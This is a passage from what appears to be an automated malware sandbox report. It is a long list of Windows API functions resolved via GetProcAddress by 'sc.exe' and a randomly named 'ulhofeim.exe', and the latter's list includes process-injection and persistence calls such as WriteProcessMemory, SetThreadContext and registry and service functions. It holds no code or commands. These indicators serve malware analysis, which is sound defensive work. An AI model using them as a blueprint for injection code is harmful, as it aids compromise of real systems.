ImmLockImeDpi (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003996)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002188)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002188)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002912)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002912)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00002944)\n \"ulhofeim.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00002944)\n \"ulhofeim.exe\" called 